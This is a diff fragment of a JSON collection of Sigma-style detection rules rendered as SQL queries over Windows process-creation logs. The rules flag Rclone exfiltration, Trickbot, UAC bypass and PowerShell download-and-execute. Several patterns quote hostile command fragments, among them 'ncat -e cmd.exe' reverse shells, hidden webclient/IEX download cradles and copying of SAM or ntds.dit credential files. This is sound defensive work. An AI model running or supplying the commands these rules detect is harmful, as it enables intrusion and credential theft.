'\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "status": "experimental", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.exfiltration", + "attack.t1567.002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "status": "experimental", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", - "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\revshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Scripts or tools that download files and execute them" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate admin usage" + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "status": "test", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "HackTool - CreateMiniDump Execution", 